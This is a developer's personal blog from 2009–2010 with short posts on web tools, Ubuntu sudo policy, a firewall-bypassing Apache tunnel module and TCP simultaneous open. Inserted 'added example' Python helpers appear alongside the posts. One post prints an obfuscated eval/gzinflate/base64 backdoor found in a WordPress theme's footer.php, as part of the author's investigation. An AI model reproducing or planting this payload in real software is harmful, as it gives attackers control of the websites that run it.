Monday, July 12. 2010
I'm happy to see that the new PC Authority downloads site went live.
If you want a similar site, just ask.
Tuesday, May 25. 2010
This very useful dialog pops up when you aren't an administrator on Windows 2003, annoying you until you decide that it's time to reboot. Or find someone that can do it, that is.
I guess it deserves a UI Design Award.
Wednesday, February 10. 2010
A new software reviews site went live recently: Softwarecrew.
In my just-a-little-bit biased opinion, it's looking nice, but I should probably mention that I've worked on the WordPress theme it uses, plus I did write a couple of WP extensions to help the reviewers with their job.
Friday, October 30. 2009
It's been a loooong time since I've been able to browse download.cnet.com without having Firefox freeze on article pages. Something's very nasty on that site (or Firefox/one of the plugins I use is very bugged). Some guy on mozillazine suggests enabling cookies from cnet.com, but I'd rather not: there must be another way.
Anyway, AdBlock comes to the rescue. Just add a filter blocking http://*.i.com.com/*.js and the problem vanishes.
Wednesday, October 28. 2009
This article is a must for people who had a "web presence" 10 or more years ago: http://www.comedycentral.com/tosh.0/2009/10/26/goodbye-geocities/
Sometimes it's nice to look back at how things were and see all the progress that's been made since then. When I think of how my homepage looked in 1996 and compare it to the web applications I develop now for a living, with all the AJAX and scriptaculous fun, I can't help feeling old(ish).
Wednesday, July 1. 2009
So The Pirate Bay has executed the Web 2.0 business plan to perfection: give someone else's stuff away for free - then find a bigger idiot to buy the company.
[...] in the case of Web 2.0, companies go from "pre-revenue" to "post-revenue" without any revenue in between. That's where you need a bigger idiot.
-- Andrew Orlowski, on The Register
Tuesday, June 30. 2009
Version 1.23 of LogMiner, my Apache/IIS log analysis package, is now available.
This release mainly fixes some build problems on modern distributions.
Also it finally includes the cleanup function I was talking about some days ago...
Monday, June 15. 2009
Q: Web 2.0 - are we speaking from hindsight when we try to define it?
A: We are speaking from no sight at all.
"Web 2.0" is a catch word coined by Tim O'Reilly who was trying to sell books for his publishing company. In my opinion, it was the saddest moment of O'Reilly's career as for the most part, he brings clarity to technology not gummy eyewash and wool.
There is no spec, no standards committee, no list of particular technologies. It's just a vague slide made by O'Reilly that doesn't even include all the latest technologies and implies some are new that are not.
[...]
-- read on LinkedIn
Friday, June 12. 2009
I can't stand it, really.
I'm using it at the moment only because I'm forced to. I can't help considering it as a toy DB, especially comparing it to PostgreSQL or SQL Server or any other serious RDBMS.
The last thing that hit my nerve is this bug. Come on... can't it even handle foreign keys in a decent way?
And I'm trying not to think that it allows you to define a table with foreign keys and silently ignore them.
</rant>
Monday, June 8. 2009
Hey, I'm following the live coverage of WWDC and just read this nice detail... that is a good price for a little update, Microsoft should learn a lesson or two...
Tuesday, May 26. 2009
I was looking for a theme to use in a WordPress blog and I stumbled on this one.
Cool, I thought, I might use it... but... hey... why is there this weird stuff in footer.php?
<? eval(gzinflate(base64_decode('vZHRasIwFIavV/AdQpCSglSvJ7INV3Aw0 NV2N2MESU9tZpZTkuiE6bsvOrsibre7/c+X/3xJwBg03ECNxkm9ZINoGHTHWEC ePpIRoZVz9XW/r6ReFShWscD3vkDtQLu4ruobWYzCCq0b0XhtFGjhj7Iunyfpc 5K+0EmWzfhkOs/oaxTTcG3kH2CaPOXJPON5+uDRYdAJZEkYk9ptFootwXFRL vlmYRhdKIUf3JfwEmvQNIrIbkdOpNSSe/o3KiJhSMq1Fk6i5rCV1llGS6mAH/u/ b2UPfZ+d4ApEheT2Ysya14mGnWBPQFn4R9NGrnvS8V90VDyzOqm/odSM0h5 p4HPji35xUPBWrl1S+f6f+HzHMbbgsPYDUfXI2E+ms4xPkrv7JO2RQYvBFsQBa hOh0EIT7b8A'))); ?>
Uhm... it looks very suspicious. Too suspicious. Let's replace eval with die and check what all that stuff is:
Yep. It definitely looks like a backdoor.
It seems that you can never be too careful...
(it seems like the first version I downloaded is different from the one on the site mentioned above, although there's still something evil in footer.php)
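The same inspection can be done without running any PHP at all. The following is an added example, not code from the original post: a small Python helper that finds the eval(gzinflate(base64_decode('...'))) wrapper in a theme file and inflates it statically, layer by layer, so the hidden code can be read instead of executed. The function names and the sample input are constructed for illustration.

```python
import base64
import re
import zlib

# Matches the eval(gzinflate(base64_decode('...'))) wrapper seen in footer.php.
WRAPPER = re.compile(
    r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*(['\"])([A-Za-z0-9+/=\s]+)\1",
    re.IGNORECASE)
MAX_OUTPUT = 1 << 20   # cap inflated size so a hostile blob cannot exhaust memory
MAX_LAYERS = 10        # obfuscators often nest the wrapper several times


def inflate(b64_text):
    """PHP's gzinflate() reads raw DEFLATE data, hence wbits = -15."""
    raw = base64.b64decode(re.sub(r"\s+", "", b64_text))
    data = zlib.decompressobj(-15).decompress(raw, MAX_OUTPUT)
    return data.decode("utf-8", "replace")


def unwrap(php_source):
    """Return (layers_removed, decoded_text); nothing is ever executed."""
    text, layers = php_source, 0
    while layers < MAX_LAYERS:
        match = WRAPPER.search(text)
        if not match:
            break
        try:
            text = inflate(match.group(2))
        except (ValueError, zlib.error):
            break          # not valid base64/DEFLATE: keep what we have so far
        layers += 1
    return layers, text


def make_sample(payload, depth):
    """Constructed input: wrap harmless PHP the same way, `depth` times."""
    for _ in range(depth):
        comp = zlib.compressobj(9, zlib.DEFLATED, -15)
        blob = comp.compress(payload.encode()) + comp.flush()
        payload = "eval(gzinflate(base64_decode('%s')));" % base64.b64encode(blob).decode()
    return "<? %s ?>" % payload


if __name__ == "__main__":
    sample = make_sample('echo "constructed footer";', 3)
    print(unwrap(sample))
```

Running it over every .php file of a downloaded theme before installing it flags any file where the layer count is greater than zero.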
Saturday, May 2. 2009
I've just written a small script to store reports generated by FeedbackReporter on a Mantis system.
It should come in handy to keep track of your application crashes (crash? uh? My apps never crash!)
You can download it here.
Simply extract it on your webserver and edit config.php to adjust your settings.
It can work in two ways: if you're installing it on the same server running mantis, set MANTIS_LOCAL to true and MANTIS_PATH to the root of your mantis installation.
Otherwise, you can even install it on a different server and let it communicate with your mantis via SOAP. In order to do this, set MANTIS_LOCAL to false and edit MANTIS_URL. This setup needs the SOAP extension of PHP5, so make sure it's available.
Feedback is welcome, of course.
Wednesday, April 29. 2009
Recently I've been administering my first Ubuntu machine and I already feel a bit perplexed about its security setup.
The issue is that by default, the root account password is locked in Ubuntu and you are encouraged never to use root, but rely on sudoers for system administration.
I've read the rationale on Ubuntu's wiki and I agree on some points, but their mindset is totally biased towards a desktop setup.
Let's consider these points from their site:
Benefits of using sudo: Users don't have to remember an extra password. This is cool for Average Joe, but don't tell me that it's an advantage on a serious server: it's actually a downside, see the next point.
Every cracker trying to brute-force their way into your box will know it has an account named root and will try that first. What they don't know is what the usernames of your other users are. Since the root account password is locked, this attack becomes essentially meaningless, since there is no password to crack or guess in the first place.
Sure, the attack on root becomes useless; too bad that SSH brute-force attacks usually try lots of different usernames. If they manage to break a single account of a sudoer, they automatically have control of your machine. If you had to remember a different password to su your way, it would make their life a bit harder.
Allows easy transfer for admin rights, in a short term or long term period, by adding and removing users from groups, while not compromising the root account.
err... what does "not compromising the root account" actually mean? If I get admin rights, I can do whatever I want, including compromising any account. Unless I get authorisation just to run a limited set of commands through sudo, but that's not the point of this post.
The root account password does not need to be shared with everybody who needs to perform some type of administrative task(s) on the system.
ok, but what problem does it solve? (apart from avoiding people shouting the root password when they shouldn't)
If I want to remove a person from the admin group, I need to trust her not to have planted any malicious program (rootkits, backdoors...), or rebuild the system if I really want to be on the safe and paranoid side.
IMHO, it's just the same as changing the root password when one is gone, or even better, periodically.
I'm not convinced. I still prefer the common su approach typical of almost all the other distributions...
Sunday, April 12. 2009
mod_tunnel is a simple Apache module that can be used to create TCP tunnels using your Web server. It is useful to expose services which can be reached through a proxy, bypassing firewalls.
After only 4 years since the previous version, you can now download version 2.0 which works with Apache 2.2.x (and maybe 2.0.x, but I haven't tested it).
You'll find it on sourceforge.
Tuesday, February 10. 2009
I've encountered a network problem that left me a bit puzzled.
Usually, when you want to set up a TCP connection between two sockets (let's call them S1 and S2), you need to perform these steps on the server:
- create S1
- bind S1 to a port (or to a port/address, if you need to)
- set S1 to listen for connections
on the client:
- create S2
- tell S2 to connect to S1
and finally, the server receives the connection attempt and accepts it to remove it from the backlog of the listening socket.
Well, apparently there's another way, which I suspect few know about.
Check out this simple application:
using System;
using System.Net;
using System.Net.Sockets;
using System.Threading;

namespace SocketTest
{
    class Program
    {
        private static IPEndPoint a = new IPEndPoint(IPAddress.Loopback, 18000);
        private static IPEndPoint b = new IPEndPoint(IPAddress.Loopback, 18001);

        static void Main(string[] args)
        {
            Thread threadA = new Thread(ThreadA);
            Thread threadB = new Thread(ThreadB);
            threadB.Start();
            threadA.Start();
        }

        // Binds to b and keeps trying to connect to a. Nobody ever listens.
        static void ThreadA()
        {
            for (;;)
            {
                try
                {
                    Socket sock = new Socket(a.AddressFamily, SocketType.Stream, ProtocolType.Tcp);
                    sock.Bind(b);
                    sock.Connect(a);
                    Console.WriteLine("Connected from " + b + " to " + a);
                    Thread.Sleep(Timeout.Infinite);
                }
                catch { } // attempt failed: try again
            }
        }

        // Mirror image of ThreadA: binds to a and keeps trying to connect to b.
        static void ThreadB()
        {
            for (;;)
            {
                try
                {
                    Socket sock = new Socket(b.AddressFamily, SocketType.Stream, ProtocolType.Tcp);
                    sock.Bind(a);
                    sock.Connect(b);
                    Console.WriteLine("Connected from " + a + " to " + b);
                    Thread.Sleep(Timeout.Infinite);
                }
                catch { } // attempt failed: try again
            }
        }
    }
}
Let's see what happens compiling and running it:
Yes, you get a connection between the two sockets. It's something I was never told about and I would have never expected to see. But it's correct as per RFC 793.
I've found out about it when a couple of clients on a test system started connecting between themselves, while they were supposed to connect to 2 different servers on localhost. Both clients were periodically trying to connect to their server, which was down. They were creating a new socket for every attempt, without binding it, thus Windows' TCP/IP stack assigned a sequential port number to them. Eventually, the two processes reached the configuration required for the "Simultaneous Connection Synchronization" as described in the RFC.
Interesting. I guess you live and you learn.
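To make the RFC 793 behaviour concrete, here is an added example (not part of the original post): a tiny Python model of the handshake states involved, with no real sockets. It contrasts the case where both SYNs are in flight at once with the ordinary case where a lone SYN reaches a port nobody is using. The class, the function and the sequence numbers 100 and 300 are constructed for illustration.

```python
from collections import deque


class Endpoint:
    """Active-open half of the RFC 793 handshake; there is no LISTEN state."""

    def __init__(self, name, iss):
        self.name, self.iss, self.state = name, iss, "CLOSED"

    def connect(self):
        self.state = "SYN-SENT"
        return {"flags": "SYN", "seq": self.iss, "ack": None}

    def receive(self, seg):
        """Handle one segment and return the reply segment, or None."""
        if "RST" in seg["flags"]:
            self.state = "CLOSED"            # connection refused
            return None
        if self.state == "CLOSED":
            # Nothing is connecting from or listening on this port: refuse.
            return {"flags": "RST,ACK", "seq": 0, "ack": seg["seq"] + 1}
        if self.state == "SYN-SENT" and seg["flags"] == "SYN":
            # The peer's SYN crossed ours: simultaneous open.
            self.state = "SYN-RECEIVED"
            return {"flags": "SYN,ACK", "seq": self.iss, "ack": seg["seq"] + 1}
        if self.state == "SYN-RECEIVED" and seg["ack"] == self.iss + 1:
            self.state = "ESTABLISHED"       # our own SYN has been acknowledged
        return None


def run(simultaneous):
    """Exchange segments between A and B; return (final states, trace)."""
    a, b = Endpoint("A", iss=100), Endpoint("B", iss=300)
    wire = deque([(b, a.connect())])         # entries are (destination, segment)
    if simultaneous:
        wire.append((a, b.connect()))        # B's SYN is in flight as well
    trace = []
    while wire:
        dst, seg = wire.popleft()
        src = a if dst is b else b
        trace.append("%s->%s %s seq=%s ack=%s"
                     % (src.name, dst.name, seg["flags"], seg["seq"], seg["ack"]))
        reply = dst.receive(seg)
        if reply:
            wire.append((src, reply))
    return (a.state, b.state), trace


if __name__ == "__main__":
    for mode in (True, False):
        states, trace = run(mode)
        print(states, *trace, sep="\n  ")
```

Since either side can end up connected to an unintended peer this way, a client that matters should verify who it is talking to at the application layer rather than assume the port number implies the server.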